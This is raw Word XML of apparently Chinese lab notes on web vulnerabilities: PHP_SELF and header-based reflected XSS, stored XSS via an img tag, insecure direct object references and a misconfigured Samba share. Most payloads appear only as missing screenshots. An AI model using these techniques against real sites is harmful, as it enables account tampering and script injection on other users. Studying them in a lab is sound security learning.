      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hp</w:t>
      </w:r>
      <w:r w:rsidR="00CE0FD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>my</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4804782A" w14:textId="2CBAC845" w:rsidR="00CE0FD7" w:rsidRPr="00CE0FD7" w:rsidRDefault="00CE0FD7" w:rsidP="00CE0FD7">
      <w:r w:rsidRPr="00CE0FD7">
        <w:t>CVE-2010-4480</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>待更新。。。。。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3759FA4B" w14:textId="481B206D" w:rsidR="00CE0FD7" w:rsidRDefault="005168C8" w:rsidP="00CE0FD7">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>SELF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBD01D4" w14:textId="53B7D940" w:rsidR="00CE0FD7" w:rsidRDefault="00B57CF6" w:rsidP="00CE0FD7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11E2A33A" wp14:editId="48539787">
            <wp:extent cx="5274310" cy="1173480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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1173480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F165C6B" w14:textId="1442C088" w:rsidR="005168C8" w:rsidRDefault="005168C8" w:rsidP="00CE0FD7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="604B3E50" wp14:editId="3FED78DE">
            <wp:extent cx="5274310" cy="2520950"/>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2520950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8DFB56" w14:textId="68078CE8" w:rsidR="005168C8" w:rsidRDefault="005168C8" w:rsidP="005168C8">
      <w:r>
        <w:t>$_SERVER['PHP_SELF'] 表示当前 php 文件相对于网站根目录的位置地址，与 document root 相关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>由于利用 $_SERVER['PHP_SELF'] 可以很方便的获取当前页面地址，因此一些程序员在提交表单数据到当前页面进行处理时，往往喜欢使用如下这种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE0D9C0" w14:textId="17EFDD40" w:rsidR="005168C8" w:rsidRPr="005168C8" w:rsidRDefault="005168C8" w:rsidP="005168C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>&lt;form method="post" action="&lt;?php echo $_SERVER['PHP_SELF']; ?&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5862C1AB" w14:textId="638BDF49" w:rsidR="005168C8" w:rsidRDefault="005168C8" w:rsidP="005168C8">
      <w:r>
        <w:t>假设该页面地址为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA992AE" w14:textId="0801D6CE" w:rsidR="005168C8" w:rsidRPr="00F30FAD" w:rsidRDefault="00F30FAD" w:rsidP="005168C8">
      <w:r>
        <w:t>http://www</w:t>
      </w:r>
      <w:r w:rsidR="005168C8">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>f4guo.</w:t>
      </w:r>
      <w:r w:rsidR="005168C8">
        <w:t>com/php/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBDC0DF" w14:textId="499A43CC" w:rsidR="005168C8" w:rsidRDefault="005168C8" w:rsidP="005168C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问该页面，得到的表单</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> html 代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E954308" w14:textId="3E27D455" w:rsidR="005168C8" w:rsidRPr="00F30FAD" w:rsidRDefault="005168C8" w:rsidP="005168C8">
      <w:r>
        <w:t>&lt;form method="post" action="/php/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0461E7" w14:textId="190997F3" w:rsidR="005168C8" w:rsidRPr="00F30FAD" w:rsidRDefault="005168C8" w:rsidP="005168C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码是正确的，但是当访问地址变成：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F96D226" w14:textId="65AC48AB" w:rsidR="005168C8" w:rsidRPr="00F30FAD" w:rsidRDefault="005168C8" w:rsidP="005168C8">
      <w:r>
        <w:t>http://www.</w:t>
      </w:r>
      <w:r w:rsidR="00F30FAD">
        <w:t>f4guo</w:t>
      </w:r>
      <w:r>
        <w:t>.com/php/index.php/test/foo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23698A1A" w14:textId="1D6CB751" w:rsidR="005168C8" w:rsidRPr="00F30FAD" w:rsidRDefault="005168C8" w:rsidP="005168C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面正常执行了，表单</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> html 代码变成：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E3CD5B" w14:textId="77777777" w:rsidR="005168C8" w:rsidRDefault="005168C8" w:rsidP="005168C8">
      <w:r>
        <w:t>&lt;form method="post" action="/php/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/test/foo"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1849E198" w14:textId="77777777" w:rsidR="005168C8" w:rsidRDefault="005168C8" w:rsidP="005168C8"/>
    <w:p w14:paraId="3269FF27" w14:textId="6EC1672E" w:rsidR="005168C8" w:rsidRDefault="005168C8" w:rsidP="005168C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显然这段代码不是我们期望的，攻击者可以在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL 后面随意加上攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173889FB" w14:textId="08EFD660" w:rsidR="00F30FAD" w:rsidRDefault="00F30FAD" w:rsidP="005168C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考文档：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F30FAD">
        <w:t>http://www.5idev.com/p-php_server_php_self.shtml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A453F3" w14:textId="673FE50F" w:rsidR="00F30FAD" w:rsidRDefault="00F30FAD" w:rsidP="00F30FAD">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6469751C" w14:textId="5A6ED6A9" w:rsidR="008D57CE" w:rsidRDefault="008D57CE" w:rsidP="00F30FAD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据提示修改H</w:t>
      </w:r>
      <w:r>
        <w:t>TTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头部，增加</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB73BDF" w14:textId="56874E42" w:rsidR="008D57CE" w:rsidRDefault="008D57CE" w:rsidP="00F30FAD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FD215EA" wp14:editId="550721A8">
            <wp:extent cx="5274310" cy="767080"/>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767080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19436112" w14:textId="7A74F761" w:rsidR="00F30FAD" w:rsidRDefault="008D57CE" w:rsidP="00F30FAD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F8AE12" wp14:editId="46991986">
            <wp:extent cx="5274310" cy="1906270"/>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1906270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C4C1C" w14:textId="57628C56" w:rsidR="008D57CE" w:rsidRDefault="008D57CE" w:rsidP="00F30FAD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本执行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F380A" w14:textId="73FFC969" w:rsidR="00F30FAD" w:rsidRDefault="008D57CE" w:rsidP="005168C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3336D9C9" wp14:editId="793CA297">
            <wp:extent cx="5274310" cy="1369060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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1369060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D16AAE3" w14:textId="72DCE5FA" w:rsidR="00405F46" w:rsidRDefault="00405F46" w:rsidP="00405F46">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>User-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6FA9D3" w14:textId="60251D3A" w:rsidR="00405F46" w:rsidRPr="00405F46" w:rsidRDefault="00405F46" w:rsidP="00405F46">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ADF2C90" wp14:editId="0FCB1753">
            <wp:extent cx="5274310" cy="1348105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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1348105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E44AA" w14:textId="261ABF78" w:rsidR="00405F46" w:rsidRDefault="00405F46" w:rsidP="005168C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B303163" wp14:editId="47B7F5A2">
            <wp:extent cx="5274310" cy="1284605"/>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1284605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="281156DC" w14:textId="621820A6" w:rsidR="00405F46" w:rsidRDefault="00405F46" w:rsidP="005168C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看源码也能看到插入的脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D53251" w14:textId="77777777" w:rsidR="00655141" w:rsidRPr="00AC2324" w:rsidRDefault="00655141" w:rsidP="00AC2324"/>
    <w:p w14:paraId="7FCAFDFE" w14:textId="36DEA540" w:rsidR="003C2A00" w:rsidRDefault="0093787E" w:rsidP="00806689">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA5D8A7" w14:textId="631F8DB2" w:rsidR="00405F46" w:rsidRDefault="00405F46" w:rsidP="00405F46">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Blog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8BCFE9" w14:textId="39DBF45C" w:rsidR="00405F46" w:rsidRDefault="00405F46" w:rsidP="00405F46">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接输入</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463A41DE" w14:textId="6A326629" w:rsidR="00405F46" w:rsidRPr="00405F46" w:rsidRDefault="00405F46" w:rsidP="00405F46">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A8615E0" wp14:editId="050DDB13">
            <wp:extent cx="5274310" cy="3418840"/>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3418840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01956B1D" w14:textId="7F9A1B86" w:rsidR="00405F46" w:rsidRDefault="00405F46" w:rsidP="003C2A00"/>
    <w:p w14:paraId="561EE9A7" w14:textId="45003F38" w:rsidR="00405F46" w:rsidRDefault="00405F46" w:rsidP="00405F46">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Change</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ecret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF32D2" w14:textId="363FB93B" w:rsidR="00405F46" w:rsidRDefault="00545B49" w:rsidP="003C2A00">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>待更新</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B1ED9E" w14:textId="55F5906D" w:rsidR="00545B49" w:rsidRDefault="00545B49" w:rsidP="003C2A00"/>
    <w:p w14:paraId="35618E90" w14:textId="16765581" w:rsidR="00545B49" w:rsidRDefault="00545B49" w:rsidP="00806689">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497BD492" w14:textId="54BAF3C1" w:rsidR="00545B49" w:rsidRDefault="00545B49" w:rsidP="00545B49">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>待更新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688A2AE2" w14:textId="3C5966FA" w:rsidR="00545B49" w:rsidRDefault="00545B49" w:rsidP="00545B49">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>manager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD04A95" w14:textId="759633B0" w:rsidR="00545B49" w:rsidRPr="00545B49" w:rsidRDefault="00545B49" w:rsidP="00545B49">
      <w:r w:rsidRPr="00545B49">
        <w:t>CVE-2012-5105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C016F" w14:textId="1E49E44B" w:rsidR="00405F46" w:rsidRDefault="00405F46" w:rsidP="003C2A00"/>
    <w:p w14:paraId="13C7E6BE" w14:textId="1D82BDD3" w:rsidR="00545B49" w:rsidRDefault="00545B49" w:rsidP="00806689">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>User-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB9004C" w14:textId="52F5A897" w:rsidR="00545B49" w:rsidRDefault="00545B49" w:rsidP="003C2A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35519BDF" wp14:editId="05D04C01">
            <wp:extent cx="5274310" cy="1614170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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1614170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0877E68D" w14:textId="11FD1AA2" w:rsidR="00405F46" w:rsidRDefault="00545B49" w:rsidP="003C2A00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F370E6" wp14:editId="4578DCC9">
            <wp:extent cx="5274310" cy="2511425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="317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310" cy="2511425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EEDB44" w14:textId="77777777" w:rsidR="00405F46" w:rsidRDefault="00405F46" w:rsidP="003C2A00"/>
    <w:p w14:paraId="079A2A9F" w14:textId="67F2D29A" w:rsidR="003C2A00" w:rsidRDefault="00545B49" w:rsidP="00545B49">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不安全的对象直接引用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4432A5DF" w14:textId="4BB2CB60" w:rsidR="00545B49" w:rsidRDefault="002E21E7" w:rsidP="002E21E7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103DBCA6" w14:textId="0ED7B718" w:rsidR="002E21E7" w:rsidRDefault="002E21E7" w:rsidP="002E21E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11A81BFE" wp14:editId="05970CEE">
            <wp:extent cx="5274310" cy="2242185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="571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4310" cy="2242185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0497C2C7" w14:textId="60E10F0E" w:rsidR="002E21E7" w:rsidRDefault="002E21E7" w:rsidP="002E21E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="350B853F" wp14:editId="4364886D">
            <wp:extent cx="5274310" cy="3637915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="63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4310" cy="3637915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2349B471" w14:textId="350D58F8" w:rsidR="002E21E7" w:rsidRDefault="002E21E7" w:rsidP="002E21E7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>重置secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2677E654" w14:textId="7E4F6653" w:rsidR="002E21E7" w:rsidRDefault="002E21E7" w:rsidP="002E21E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72969EEF" wp14:editId="0D65B241">
            <wp:extent cx="5274310" cy="2299970"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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4310" cy="2299970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24734E8D" w14:textId="486F5B3A" w:rsidR="002E21E7" w:rsidRPr="000819CB" w:rsidRDefault="002E21E7" w:rsidP="002E21E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个参数都能修改，没有校验用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E04DB51" w14:textId="15D4BC5A" w:rsidR="002E21E7" w:rsidRDefault="002E21E7" w:rsidP="002E21E7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>订单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4A97AC" w14:textId="71BEA8DC" w:rsidR="002E21E7" w:rsidRDefault="002E21E7" w:rsidP="002E21E7"/>
    <w:p w14:paraId="6AC2554B" w14:textId="272045C3" w:rsidR="002E21E7" w:rsidRDefault="006035CF" w:rsidP="002E21E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C2112D3" wp14:editId="362027CE">
            <wp:extent cx="5274310" cy="1545590"/>
            <wp:effectExtent l="0" t="0" r="254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4310" cy="1545590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2E230B" w14:textId="60F1F1F8" w:rsidR="002E21E7" w:rsidRDefault="006035CF" w:rsidP="002E21E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CDCA8B0" wp14:editId="41473A88">
            <wp:extent cx="5274310" cy="2206625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="317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4310" cy="2206625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298613B" w14:textId="649D5363" w:rsidR="002E21E7" w:rsidRDefault="002E21E7" w:rsidP="002E21E7"/>
    <w:p w14:paraId="76009150" w14:textId="116A328C" w:rsidR="006035CF" w:rsidRDefault="006035CF" w:rsidP="00806689">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全性错误配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE7CF2" w14:textId="713E2021" w:rsidR="006035CF" w:rsidRDefault="006035CF" w:rsidP="006035CF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意文件访问(</w:t>
      </w:r>
      <w:r>
        <w:t>samba)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6487F1B2" w14:textId="730BACA3" w:rsidR="006035CF" w:rsidRDefault="006035CF" w:rsidP="006035CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Samba服务器配置不安全，它允许攻击者读取或写入任意文件！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ED67B4" w14:textId="1B938741" w:rsidR="006035CF" w:rsidRDefault="006035CF" w:rsidP="006035CF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨域策略文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EC916B" w14:textId="2F938260" w:rsidR="006B5D5B" w:rsidRDefault="006035CF" w:rsidP="006035CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
